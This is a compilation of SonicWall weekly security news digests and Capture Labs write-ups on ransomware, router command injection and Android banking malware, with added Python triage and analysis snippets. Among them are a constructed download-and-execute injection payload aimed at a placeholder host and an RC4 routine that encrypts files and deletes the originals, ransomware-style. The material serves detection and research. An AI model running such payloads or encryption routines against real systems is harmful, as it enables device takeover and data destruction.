
Cybersecurity News & Trends – 07-31-20

This week, ransomware attacks on U.S. governments, the energy sector, sports teams and smartwatch maker Garmin made headlines — and with cryptocurrency on the rise, more may be in store.


SonicWall Spotlight

Malware is Down, But IoT and Ransomware Attacks Are Up — TechRepublic

  • Malicious attacks disguised as Microsoft Office files increased 176%, according to SonicWall’s midyear threat report.

Sharp Spike in Ransomware in U.S. as Pandemic Inspires Attackers — ThreatPost

  • COVID-19 has changed the face of cybercrime, as the latest malware statistics show.

Inactive wear! Smartwatch maker Garmin suffers widespread outages after ‘ransomware attack’ – leaving thousands unable to track their workouts — Daily Mail

  • According to Bill Conner, the combination of remote internet connections and less secure personal computers has increased organizations’ risk of being compromised.

Smartwatch maker Garmin suffers outage after ransomware attack — The Telegraph

  • SonicWall found that there had been a 20% increase in the number of ransomware attacks in the first half of the year, to more than 120 million.

HoJin Kim Named to CRN’s Top 100 Executives of 2020 List, Which Highlights 25 Sales Executives Leading the Channel Charge — CRN

  • Kim has revolutionized pricing for MSSPs, with a pay-as-you-go model for SonicWall’s software products that delivers a cost savings of 20% over buying an annual license.

Cybersecurity News

FBI warns of Netwalker ransomware targeting US government and orgs — Bleeping Computer

  • The FBI has issued a security alert about Netwalker ransomware operators, advising victims not to pay the ransom and to report incidents to their local FBI field offices.

Russia’s GRU Hackers Hit US Government and Energy Targets — Wired

  • A previously unreported Fancy Bear campaign persisted for well over a year — suggesting the notorious group behind the attacks has broadened its focus.

UK govt warns of ransomware, BEC attacks against sports sector — Bleeping Computer

  • The UK National Cyber Security Centre has highlighted the increasing number of ransomware, phishing and BEC schemes targeting sports organizations.

Bitcoin rises above $10,000 for first time since early June — Reuters

  • After several weeks of trading in narrow ranges, Bitcoin has breached $10,000 for the first time since early June.

Feature-rich Ensiko malware can encrypt, targets Windows, macOS, Linux — Bleeping Computer

  • Threat researchers have found a new feature-rich malware that can encrypt files on any system running PHP.

CISO concern grows as ransomware plague hits close to home — ZDNet

  • An increasing wave of cybercrime targeting Fortune 500 companies is starting to ring alarm bells.

BootHole GRUB bootloader bug lets hackers hide malware in Linux, Windows — Bleeping Computer

  • When properly exploited, a severe vulnerability in almost all signed versions of GRUB2 bootloader could enable compromise of an operating system’s booting process even if the Secure Boot verification mechanism is active.

OkCupid: Hackers want your data, not a relationship — ZDNet

  • Researchers have discovered a way to steal the personal and sensitive data of users on the popular dating app.

US defense contractors targeted by North Korean phishing attacks — Bleeping Computer

  • Employees of U.S. defense and aerospace contractors were targeted in a large-scale spearphishing campaign designed to infect their devices and to exfiltrate defense tech intelligence.

In Case You Missed It

Exorcist ransomware casts triple punishment for non-payment. CIS countries spared.

The SonicWall Capture Labs threat research team has observed reports of a new ransomware named Exorcist. It is reported to have surfaced over the past week on an underground Russian forum, offered under the ransomware-as-a-service (RaaS) model with a 30% commission retained by the creator. The initial cost of file recovery is $500 USD (paid in Bitcoin), which triples if payment is not made within 48 hours.

 

Infection Cycle:

 

Upon infection, files on the system are encrypted and given a random six-letter extension (mixed-case ASCII letters), e.g. “.GyQUfe”. The following image is displayed as the desktop background:

 

The malware drops the following files onto the system:

  • %APPDATA%\Local\Temp\boot.sys (0 bytes)
  • %APPDATA%\Local\Temp\msdt (0 bytes)
  • %APPDATA%\Local\Temp\d.bmp
  • GyQUfe-decrypt.hta (dropped in every directory containing encrypted files)

 

d.bmp contains the image that is displayed on the desktop background.
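As an added example (not part of the SonicWall report), a small Python triage script that looks for the two on-disk artifacts described above: ransom notes named <ext>-decrypt.hta in each directory holding encrypted files, and files carrying that same six-letter extension. The directory tree it scans is constructed inside the script; GyQUfe is the extension from this sample, and the regex assumes the six-letter mixed-case pattern described above.

```python
"""
Triage helper for Exorcist-style ransomware artifacts.

Added example, not from the original report. It recovers the random
extension from the ransom-note name (<ext>-decrypt.hta) instead of
hard-coding it, then lists every file carrying that extension. The
sample tree it scans is constructed here for the demonstration.
"""
import os
import re
import tempfile
from pathlib import Path

# Six ASCII letters, any case, followed by "-decrypt.hta" (pattern from the report)
NOTE_RE = re.compile(r"^([A-Za-z]{6})-decrypt\.hta$")


def find_exorcist_artifacts(root):
    """Walk `root` and return the note extensions seen, the directories that hold
    a note, and the files whose extension matches one of those notes."""
    root = Path(root)
    note_dirs = {}  # extension -> list of directories containing a note
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            m = NOTE_RE.match(name)
            if m:
                note_dirs.setdefault(m.group(1), []).append(str(Path(dirpath)))

    encrypted = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            ext = Path(name).suffix.lstrip(".")  # "report.docx.GyQUfe" -> "GyQUfe"
            if ext in note_dirs:
                encrypted.append(str(Path(dirpath) / name))

    return {
        "extensions": sorted(note_dirs),
        "note_dirs": note_dirs,
        "encrypted_files": sorted(encrypted),
    }


def build_sample_tree(root):
    """Create a small constructed directory tree imitating an infected host."""
    root = Path(root)
    (root / "docs").mkdir(parents=True)
    (root / "docs" / "report.docx.GyQUfe").write_bytes(b"\x00" * 16)
    (root / "docs" / "budget.xlsx.GyQUfe").write_bytes(b"\x00" * 16)
    (root / "docs" / "GyQUfe-decrypt.hta").write_text("<html>constructed ransom note</html>")
    (root / "clean").mkdir()
    (root / "clean" / "notes.txt").write_text("untouched")
    (root / "clean" / "photo.jpeg").write_bytes(b"\xff\xd8")  # 4-letter ext, must not match
    return root


def demo():
    """Build the constructed tree in a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        return find_exorcist_artifacts(build_sample_tree(tmp))


if __name__ == "__main__":
    result = demo()
    print("extensions:", result["extensions"])
    print("dirs with notes:", result["note_dirs"])
    print("encrypted files:", result["encrypted_files"])
```

Point it at a mounted image or a live host root. Because the extension is recovered from the note name rather than hard-coded, the same check works on another infection with a different random extension; the paths it returns are the first thing to preserve before any cleanup.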

 

GyQUfe-decrypt.hta contains the following message:

 

hxxp://217.8.117.26/pay and hxxp://4dnd3utjsmm2zcsb.onion/pay lead to the following pages:

 

The infection is reported to the same webserver (217.8.117.26) along with encrypted information:

 

Disassembling the code reveals the ability to disable various system recovery methods:

 

It also contains a list of processes to terminate, so that files those processes hold open with exclusive locks are released and can be encrypted:

 

Before encrypting, the malware performs a check to avoid encrypting systems in CIS (Commonwealth of Independent States) countries:

 

The malware states that the ransom fee will be tripled if payment is not made on time. We confirmed this by checking back a few days later:

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Exorcist.RSM_2 (Trojan)
  • GAV: Blackheart.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

Cybersecurity News & Trends – 07-24-20

This week, SonicWall reveals what the “new business normal” looks like for cybercriminals in the mid-year update to the 2020 Cyber Threat Report.


SonicWall Spotlight

SonicWall Report: COVID-19 Has Created ‘Boon’ For Criminals — ZDNet

  • In an article on SonicWall’s Mid-Year Threat Report, ZDNet highlights findings that hackers have shifted their strategies due to COVID-19.

The 2020 Rising Female Stars Of The IT Channel — CRN

  • SonicWall is proud to announce one of its own, Tiffany Haselhorst, has joined other leaders within the IT channel community on CRN’s esteemed 2020 list of 100 Rising Female Stars.

Cyberthreat landscape changes to meet new business normal of Work From Home: SonicWall — Channelbuzz.ca

  • In an article on SonicWall’s Mid-Year Threat Report, Channelbuzz highlights how cybercriminals have evolved their tactics to better exploit remote work environments during the pandemic.

Malware Attacks Down As Ransomware Increases — BetaNews

  • In an article on SonicWall’s Mid-Year Threat Report, BetaNews highlights findings that malware has dropped 24% and ransomware has increased 20% globally and 109% in the U.S.

Cybersecurity News

Using Robust Tools, Cybercriminals Accelerate Their Own Digital Transformation — SiliconANGLE

  • In the online underground, crime not only pays, but attackers are rapidly developing tools and networks that rival those of legitimate enterprises today.

Blackbaud Hack: Universities lose data to ransomware attack — BBC

  • At least seven universities in the UK and Canada have had student data stolen after hackers attacked a cloud computing provider.

Ongoing Meow attack has nuked >1,000 databases without telling anyone why — Ars Technica

  • Just hours after a world-readable database exposed a wealth of sensitive user information, UFO VPN made the news again, this time because the database that stored user details was destroyed in an attack.

Apple’s Hackable iPhones Are Finally Here — Wired

  • Last year, Apple announced a special device just for hackers. The phone — for approved researchers only — will soon go into circulation.

New cryptojacking botnet uses SMB exploit to spread to Windows systems — Bleeping Computer

  • A new cryptojacking botnet is spreading across compromised networks via multiple methods, including the EternalBlue exploit for the Windows Server Message Block (SMB) protocol.

Ransomware attack locked a football club’s turnstiles — ZDNet

  • Cyber criminals are targeting sports teams, leagues and organizational bodies — and in many cases, their attacks are successful, warns the NCSC.

Lazarus hackers deploy ransomware, steal data using MATA malware — Bleeping Computer

  • A recently discovered malware framework, known as MATA and linked to the North Korean-backed Lazarus hacking group, was used in attacks targeting corporate entities from multiple countries.

House-passed defense spending bill includes provision establishing White House cyber czar — The Hill

  • The House version of the annual National Defense Authorization Act included a provision establishing a national cyber director, a role that would help coordinate federal cybersecurity efforts.

Hackers use recycled backdoor to keep a hold on hacked e-commerce server — Ars Technica

  • Easy-to-miss script can give attackers new access should they ever be booted out.

Twitter Hack Revives Concerns Over Its Data Security — The Wall Street Journal

  • The alleged perpetrator, who called himself ‘Kirk,’ was part of a subculture where hackers trade in coveted social-media accounts.

In Case You Missed It

Draytek Vigor Remote Code Execution vulnerability attacks spotted in the wild

DrayTek is a manufacturer of broadband CPE (customer premises equipment), including firewalls, VPN devices, routers and wireless LAN devices. The Vigor3900 and Vigor2960 are quad-WAN broadband router/VPN gateway products. The Vigor300B is a quad-WAN load-balancing broadband router that runs Linux.

A command-injection vulnerability (CVE-2020-14472) exists in the mainfunction.cgi file of the DrayTek Vigor3900, Vigor2960 and Vigor300B devices with firmware before version 1.5.1.1. It can be exploited for remote code execution.

The SonicWall Capture Labs threat research team has spotted attacks exploiting this vulnerability in the wild.

Some examples of the observed requests:

Decoding the URLs:

The discussion below analyzes the decoded attack:

IFS (the Internal Field Separator) is the shell variable whose characters are treated as word delimiters. If IFS is not set, the default is <space>, <tab> and <newline>. An unquoted ${IFS} in the injected string expands to those whitespace characters, which the shell then treats as word separators, so the attacker gets a multi-word command line without ever sending a literal space (a common way past input filtering on the space character). Reading ${IFS} as a space, the attack consists of the following commands:

/bin/sh -c launches a shell (on BusyBox-based firmware this is usually ash, not bash) and executes the command string that follows.

cd /tmp; changes to /tmp, typically one of the few writable locations on embedded firmware.

rm -rf arm7; removes any existing file named arm7 so a stale copy does not block the fresh download.

busybox wget <attacker’s website>; downloads the malicious payload (arm7) from the attacker’s host. BusyBox is a software suite that provides several Unix utilities in a single executable file and runs in a variety of POSIX environments such as Linux, Android and FreeBSD.

chmod 777 arm7; makes the file readable, writable and executable by everyone.

./arm7; executes the downloaded binary, which is the actual malware.

A quick Shodan search reveals a number of exposed devices:
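The decoding steps above, as an added Python example that is not part of the original analysis. It URL-decodes an injected parameter, expands ${IFS} (and the brace-less $IFS form) to a space, descends into the sh -c script and splits it into individual commands, then flags the download / chmod / execute sequence. The request string is constructed for this example; the host 192.0.2.10 is a TEST-NET placeholder, not an observed attacker address.

```python
"""
Decode and classify an ${IFS}-obfuscated command injection payload.

Added example, not from the original analysis. SAMPLE_PAYLOAD is a
constructed value in the shape of the injected parameter; the download
host 192.0.2.10 is a TEST-NET placeholder.
"""
import re
import shlex
from urllib.parse import unquote

IFS_FORMS = ("${IFS}", "$IFS")          # replace the braced form first
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
URL_RE = re.compile(r"(?:https?|tftp|ftp)://[^\s;\"']+")

# Constructed: /bin/sh -c "cd /tmp;rm -rf arm7;busybox wget http://192.0.2.10/arm7;chmod 777 arm7;./arm7"
SAMPLE_PAYLOAD = (
    "%2Fbin%2Fsh%24%7BIFS%7D-c%24%7BIFS%7D%22cd%24%7BIFS%7D%2Ftmp%3B"
    "rm%24%7BIFS%7D-rf%24%7BIFS%7Darm7%3B"
    "busybox%24%7BIFS%7Dwget%24%7BIFS%7Dhttp%3A%2F%2F192.0.2.10%2Farm7%3B"
    "chmod%24%7BIFS%7D777%24%7BIFS%7Darm7%3B.%2Farm7%22"
)


def decode_injection(raw):
    """URL-decode the parameter and expand $IFS to a space, as the shell would."""
    text = unquote(raw)
    for form in IFS_FORMS:
        text = text.replace(form, " ")
    return text


def split_commands(decoded):
    """Return the individual commands. For `sh -c "<script>"` descend into the
    script; otherwise split the top-level string on ';'."""
    try:
        argv = shlex.split(decoded)
    except ValueError:                      # unbalanced quotes in a mangled payload
        argv = decoded.split()
    if len(argv) >= 3 and argv[0].endswith("sh") and argv[1] == "-c":
        script = argv[2]
    else:
        script = decoded
    return [c.strip() for c in script.split(";") if c.strip()]


def analyse(raw):
    """Decode, split and classify: does this look like a drop-and-run payload?"""
    cmds = split_commands(decode_injection(raw))
    tokens = [tok for c in cmds for tok in c.split()]
    first_words = [c.split()[0] for c in cmds]
    downloads = any(t in DOWNLOADERS for t in tokens)   # busybox wget, curl, tftp ...
    chmods = "chmod" in first_words
    executes = any(w.startswith("./") for w in first_words)
    return {
        "commands": cmds,
        "urls": URL_RE.findall(" ".join(cmds)),
        "drop_and_run": downloads and chmods and executes,
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_PAYLOAD).items():
        print(f"{key}: {value}")
```

Because the shell does the expansion, a signature that only looks for a literal space before wget will miss this; matching on ${IFS} or $IFS inside a query parameter is the more robust heuristic, and the structural check here (download, chmod, run) is what separates a scan from an actual drop.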

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • IPS 15089:Draytek Vigor Remote Code Execution

IoCs (source IP addresses, duplicates removed)
192.3.45.185
1.203.161.58
100.33.144.84
100.38.122.182
101.108.97.145
102.66.104.204
103.209.1.230
103.238.200.62
103.4.65.78
103.55.91.146
109.237.147.16
115.133.81.181
115.85.32.210
117.6.168.102
118.70.133.196
118.70.190.137
121.32.151.178
122.176.27.17
123.24.205.232
134.19.215.196
134.90.254.172
145.220.25.28

Reha ransomware targeting Arabic speaking countries.

The SonicWall Capture Labs threat research team observed reports of a new variant family of Reha ransomware [Reha.RSM] actively spreading in the wild.

The Reha ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

The ransomware targets Arabic-speaking countries and is designed for a very specific region.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\[Name].Try2Cry (encrypted file)
    • %App.path%\[Name].txt (recovery instructions)

Once the computer is compromised, the ransomware runs the following commands:

The ransomware encrypts all files with the following extensions and appends the .Try2Cry extension to each encrypted file’s name:

*.doc,*.ppt,*.jpg,*.xls,*.pdf,*.docx,*.pptx,*.xlsx

During our analysis, we noticed that the malware uses a packer called DNGuard to avoid detection by sandboxes in the wild.

This makes it harder to build a decryptor for this ransomware.

However, using dynamic techniques we were able to inject our tooling into the ransomware process and extract data that confirms this is ransomware.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

 

Translated to English:

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs threat research team provides protection against this threat via the following signatures:

  • GAV: REHA.RSM (Trojan)
  • GAV: Invader.H_176 (Trojan)
  • GAV: Pitit.A (Trojan)

 

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

450+ Financial Android apps targeted by a multifaceted malware that uses Covid theme

The SonicWall RTDMI engine recently detected an Android malware sample that poses as a COVID-19 information app. It is an all-in-one malware with banking trojan, spyware, keylogger and ransomware functionality.

At the time of detection the file was absent from popular malware portals such as VirusTotal and ReversingLabs, which indicates the effectiveness of the RTDMI engine.

 

For an app circulated as a provider of COVID-19 information, it requests permissions that are not warranted by that purpose, which makes it suspicious:

                (permissions requested)

 

When the application is launched, it continuously prompts the user to enable accessibility for “CovidSar2” while malicious code executes behind the scenes. The app hides itself from the app list:

 

To evade detection from Google’s built-in malware protection, the app asks to disable Google Play Protect:

 

The app targets 457 applications by their package name. Targeted apps belong to banking, shopping, trading, finance & crypto wallet categories:

( Targeted package name Part1)

 

(Targeted package name Part2)

 

Technical Analysis:

Checking whether the app is running in a virtual environment:

 

The app hides its icon from the device which makes it difficult for the user to identify the app responsible for the activity:

 

Code to disable Google Play Protect:

 

It fetches installed application information from victim’s device which is later encrypted and sent to the C&C server “hxxps://tr3kjnf[.]xyz”:

 

It also has code which finds the app in the foreground, and accordingly gets an overlay page from the server:

 

Applications that rely on SMS-based two-factor authentication for sign-in can be compromised, since the malware can read incoming messages, including one-time passcodes (OTPs):

 

The app stores the list of supported malicious commands in a local configuration file named “set.xml”:

 

The malware author implemented the following commands to provide this functionality:

del_sws: Delete incoming/outgoing messages:

 

gps: Sends victim’s location details:

 

getNumber: Reads contact numbers from phonebook:

 

spamSMS: Send spam SMS to numbers specified in the configuration file:

 

block_notification: Disable notifications from the specified package:

 

crypt / decrypt: Encrypts/decrypts a file with the RC4 algorithm and adds/removes the “.AnubisCrypt” extension:

 

htmllocker: Lock the screen and display ransom note:

 

findfiles: Searches files inside specific folder names and send them to the C&C server:

 

StartRecordSound: Records device audio and saves it as a file named with the current date and time, with an “.amr” extension:
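The crypt / decrypt commands above, as an added Python example; this is not the malware’s code, and the key, file name and contents are constructed here. It implements plain RC4, appends or strips .AnubisCrypt around the file, and includes one check worth knowing for recovery: if a single RC4 key is reused across files (the report does not say whether this sample does), XORing two ciphertexts cancels the keystream and leaks the XOR of the plaintexts.

```python
"""
RC4 'crypt'/'decrypt' pair with an .AnubisCrypt extension, as an added
illustration of the command described above. Not the malware's code;
the key, file names and contents below are constructed for the demo.
"""
import tempfile
from pathlib import Path

EXT = ".AnubisCrypt"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling, then keystream XORed over the data.
    RC4 is symmetric, so the same call both encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                                  # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                                     # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def crypt(path, key):
    """Encrypt the file, write it as <name>.AnubisCrypt, delete the original."""
    p = Path(path)
    target = p.with_name(p.name + EXT)
    target.write_bytes(rc4(key, p.read_bytes()))
    p.unlink()
    return target


def decrypt(path, key):
    """Reverse of crypt: strip the extension and restore the plaintext file."""
    p = Path(path)
    if not p.name.endswith(EXT):
        raise ValueError("not an %s file" % EXT)
    target = p.with_name(p.name[: -len(EXT)])
    target.write_bytes(rc4(key, p.read_bytes()))
    p.unlink()
    return target


def keystream_reuse_leak(key, a, b):
    """If one key is reused for two files, C_a XOR C_b == P_a XOR P_b over the
    common length: the keystream cancels. Returns True when that holds."""
    n = min(len(a), len(b))
    ca, cb = rc4(key, a)[:n], rc4(key, b)[:n]
    cipher_xor = bytes(x ^ y for x, y in zip(ca, cb))
    plain_xor = bytes(x ^ y for x, y in zip(a[:n], b[:n]))
    return cipher_xor == plain_xor


def roundtrip_demo():
    """Encrypt and decrypt a constructed file; return (restored_ok, enc_name, dec_name)."""
    key = b"constructed-demo-key"                          # constructed, not from the sample
    plaintext = b"%PDF-1.4 constructed sample document"
    with tempfile.TemporaryDirectory() as tmp:
        original = Path(tmp) / "invoice.pdf"
        original.write_bytes(plaintext)
        enc = crypt(original, key)
        changed = enc.read_bytes() != plaintext
        dec = decrypt(enc, key)
        return (changed and dec.read_bytes() == plaintext, enc.name, dec.name)


if __name__ == "__main__":
    print(roundtrip_demo())
    print("keystream reuse leaks plaintext XOR:",
          keystream_reuse_leak(b"k", b"first file", b"second one"))
```

For incident response the practical point is the symmetry: whatever key the sample holds or fetches from the C&C is sufficient to decrypt, and a reused key turns every pair of encrypted files into a known-plaintext opportunity.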

 

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

 

Indicators of Compromise (IOCs):

  • 04e16d09eec3a839506e7938516ca26b

 

Evidence of detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file:

Cybersecurity News & Trends – 07-17-20

This week, between breaches at Twitter, compromise at Citrix and cyberattacks against COVID-19 vaccine manufacturers, the case for a U.S. national cyber director got even stronger.


SonicWall Spotlight

Russian Cyber Espionage Group is Trying to Steal U.S. COVID-19 Vaccine Research — Newsweek International

  • SonicWall CEO and GCHQ advisor Bill Conner said, “Russia happens to be the first country placed in the spotlight, but it was only a matter of time before a nation state resorted to cybercrime to influence or control global healthcare during a time of great need. … [Cyber] criminals tend to follow the money trail, thus putting a massive bounty on anything vaccine-related.”

Cybersecurity News

Honeywell Sees Rise in USB-Borne Malware That Can Cause Major ICS Disruption — Security Week

  • Honeywell says it has seen a significant increase over the past year in USB-borne malware that can cause disruption to industrial control systems.

Malware adds online sandbox detection to evade analysis — Bleeping Computer

  • Malware developers are now using Any.Run malware analysis service in an attempt to prevent their malware from being easily analyzed by researchers.

This botnet has surged back into action spreading a new ransomware campaign via phishing emails — ZDNet

  • There’s been a big jump in Phorpiex botnet activity – but it’s a trojan malware attack that was the most common malware campaign in June.

New AgeLocker Ransomware uses Googler’s utility to encrypt files — Bleeping Computer

  • A new and targeted ransomware named AgeLocker utilizes the ‘Age’ encryption tool created by a Google employee to encrypt victims’ files.

The case for a National Cyber Director — Cyberscoop

  • Although the effects of COVID-19 will last for years, it’s already clear that shifting more activity online has increased our society’s digital dependence even faster than expected.

‘DDoS-For-Hire’ Is Fueling a New Wave of Attacks — Wired

  • Turf wars are heating up over the routers that fuel distributed denial-of-service (DDoS) attacks.

New Mirai Variant Surfaces with Exploits for 9 Vulnerabilities — Dark Reading

  • Impacted products include routers, IP cameras, DVRs, and smart TVs.

TrickBot malware mistakenly warns victims that they are infected — Bleeping Computer

  • The notorious TrickBot malware accidentally included a test module that’s warning victims that they are infected and should contact their administrator.

Russian Hackers Blamed for Attacks on Vaccine-Related Targets — The Wall Street Journal

  • U.S. and U.K. government officials said a prominent state-backed Russian hacking group is responsible for ongoing cyberattacks against organizations involved in the development of coronavirus vaccines and other healthcare-related work.

A Brazen Online Attack Targets V.I.P. Twitter Users in a Bitcoin Scam — The New York Times

  • In a major show of force, hackers breached some of the site’s most prominent accounts, a Who’s Who of Americans in politics, entertainment and tech.

Citrix: No breach, hacker stole business info from third party — Bleeping Computer

  • Citrix has published an official statement to deny claims that the company’s network was breached by a malicious actor who says that he was also able to steal customer information.

In Case You Missed It

Malicious Android apps continue to use the Covid theme to spread different types of malware

Android malware with COVID-19-related themes continues to spread. The SonicWall Capture Labs threat research team has observed different types of Android malware propagated using the COVID-19 theme. This blog highlights some of our findings.

 

Dialer malware

  • Md5:e3475bc75d6d7225b3313942829f03bc
  • Package name: Mobile.bright
  • Application name: Corona virus

 

  • Md5: 4afe0e25e60504506a8005b58bdc74f8
  • Package name: com.my.photo.effect
  • Application name: COVID 19 UPDATE NEWS

 

  • Md5: 4161a3c2f04c60d7425ca0dbf08051d2
  • Package name: corona.virus.checkee
  • Application name: corona virus checker

 

Malicious dialers contain hardcoded premium-rate telephone numbers. They run in the background and place calls to those numbers, causing the victim to incur expensive phone bills.

The samples listed above spread using COVID-19-related themes but do not perform the functions they advertise. They contain hardcoded telephone numbers, as shown below:

Coronavirus stats with suspicious functionalities

  • Md5: 42f2eda86a8fba07a0f389fec0a6e95b
  • Package name: dulcidion.coronainfo
  • Application name: Corona Info

This app presents itself as a live information provider for global Covid-19 related infections. In the background it uses a freely available API to gather the statistics.

Interestingly, this API is used by both malicious and benign executables and APKs. This shows how malicious applications can deliver genuine information while hiding their malicious content.

This app claims to provide information about Covid-19 infections in different parts of the world. However, it contains a number of suspicious functionalities within its code that look out of place considering what it claims to do:

Checking for root status of the device:

Clipboard functionality:

Checking if vpn is being used:

Checking if emulator,VirtualBox or Genymotion is being used:

 

Remote Access Trojans

  • Md5: 6ae422acd978c308e139456d674f719b
  • Package name: dkjfxgcxkumbroynfd.sizqhephspmlculghrpkmnb.bmkfzwiobchswd
  • Application name: COVID-19

 

  • Md5: 439be2e754cfc5795d1254d8f1bc4241
  • Package name: wfwcjawnldylkf.jlhhtjzefayylrzalmjg.msblgakkhbfpyahkugaezmxrsu
  • Application name: V-Alert COVID-19

 

Both apps request accessibility service access after launch and keep showing the request window until access is granted. In the background, the app (md5: 439be2e754cfc5795d1254d8f1bc4241) communicates with a specific Twitter account to receive commands:

The shared_prefs folder contains a file – set.xml which contains a number of supported commands. A few dangerous commands from the list include:

  • keylogger
  • cryptfile
  • spamSMS
  • recordsound
  • vnc_start_new
  • htmllocker
  • textPlayProtect

We have covered a similar Android malware in more detail in one of our previous blogs.

Both apps contain packed code that introduces a number of class files filled with junk code. On execution, both drop a file with a .json extension in the app folder; in reality it is a .dex file. This .dex file contains the code for the malicious functionality, such as collecting GPS location and sending SMS messages:

 

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • Dialer.TL_3 (Trojan)
  • Presnoker.AN (Trojan)
  • Cerberus.BN (Trojan)

 

Indicators Of Compromise (IOC’s):

  • 439be2e754cfc5795d1254d8f1bc4241
  • 6ae422acd978c308e139456d674f719b
  • 42f2eda86a8fba07a0f389fec0a6e95b
  • 4161a3c2f04c60d7425ca0dbf08051d2
  • 4afe0e25e60504506a8005b58bdc74f8
  • e3475bc75d6d7225b3313942829f03bc

Microsoft Security Bulletin Coverage for July 2020

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2020. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2020-1147 .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
ASPY 5964:Malformed-File exe.MP.144

CVE-2020-1350 Windows DNS Server Remote Code Execution Vulnerability
IPS 15069:Windows DNS Server Remote Code Execution (CVE-2020-1350)

CVE-2020-1374 Remote Desktop Client Remote Code Execution Vulnerability
ASPY 5966:Malformed-File exe.MP.146

CVE-2020-1381 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 5965:Malformed-File exe.MP.145

CVE-2020-1382 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 5967:Malformed-File exe.MP.148

CVE-2020-1399 Windows Runtime Elevation of Privilege Vulnerability
ASPY 5968:Malformed-File exe.MP.149

CVE-2020-1403 VBScript Remote Code Execution Vulnerability
IPS 14849:Suspicious JavaScript/VBScript Code 56

CVE-2020-1410 Windows Address Book Remote Code Execution Vulnerability
ASPY 5963:Malformed-File wab.MP.1

CVE-2020-1426 Windows Kernel Information Disclosure Vulnerability
ASPY 5962:Malformed-File exe.MP.147

The following vulnerabilities have no known exploits in the wild:

CVE-2020-1025 Microsoft Office Elevation of Privilege Vulnerability
CVE-2020-1032 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
CVE-2020-1036 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
CVE-2020-1040 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
CVE-2020-1041 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
CVE-2020-1042 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
CVE-2020-1043 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
CVE-2020-1085 Windows Function Discovery Service Elevation of Privilege Vulnerability
CVE-2020-1240 Microsoft Excel Remote Code Execution Vulnerability
CVE-2020-1249 Windows Runtime Elevation of Privilege Vulnerability
CVE-2020-1267 Local Security Authority Subsystem Service Denial of Service Vulnerability
CVE-2020-1326 Azure DevOps Server Cross-site Scripting Vulnerability
CVE-2020-1330 Windows Mobile Device Management Diagnostics Information Disclosure Vulnerability
CVE-2020-1333 Group Policy Services Policy Processing Elevation of Privilege Vulnerability
CVE-2020-1336 Windows Kernel Elevation of Privilege Vulnerability
CVE-2020-1342 Microsoft Office Information Disclosure Vulnerability
CVE-2020-1344 Windows WalletService Elevation of Privilege Vulnerability
CVE-2020-1346 Windows Modules Installer Elevation of Privilege Vulnerability
CVE-2020-1347 Windows Storage Services Elevation of Privilege Vulnerability
CVE-2020-1349 Microsoft Outlook Remote Code Execution Vulnerability
CVE-2020-1351 Microsoft Graphics Component Information Disclosure Vulnerability
CVE-2020-1352 Windows USO Core Worker Elevation of Privilege Vulnerability
CVE-2020-1353 Windows Runtime Elevation of Privilege Vulnerability
CVE-2020-1354 Windows UPnP Device Host Elevation of Privilege Vulnerability
CVE-2020-1355 Windows Font Driver Host Remote Code Execution Vulnerability
CVE-2020-1356 Windows iSCSI Target Service Elevation of Privilege Vulnerability
CVE-2020-1357 Windows System Events Broker Elevation of Privilege Vulnerability
CVE-2020-1358 Windows Resource Policy Information Disclosure Vulnerability
CVE-2020-1359 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
CVE-2020-1360 Windows Profile Service Elevation of Privilege Vulnerability
CVE-2020-1361 Windows WalletService Information Disclosure Vulnerability
CVE-2020-1362 Windows WalletService Elevation of Privilege Vulnerability
CVE-2020-1363 Windows Picker Platform Elevation of Privilege Vulnerability
CVE-2020-1364 Windows WalletService Denial of Service Vulnerability
CVE-2020-1365 Windows Event Logging Service Elevation of Privilege Vulnerability
CVE-2020-1366 Windows Print Workflow Service Elevation of Privilege Vulnerability
CVE-2020-1367 Windows Kernel Information Disclosure Vulnerability
CVE-2020-1368 Windows Credential Enrollment Manager Service Elevation of Privilege Vulnerability
CVE-2020-1369 Windows WalletService Elevation of Privilege Vulnerability
CVE-2020-1370 Windows Runtime Elevation of Privilege Vulnerability
CVE-2020-1371 Windows Event Logging Service Elevation of Privilege Vulnerability
CVE-2020-1372 Windows Mobile Device Management Diagnostics Elevation of Privilege Vulnerability
CVE-2020-1373 Windows Network Connections Service Elevation of Privilege Vulnerability
CVE-2020-1375 Windows COM Server Elevation of Privilege Vulnerability
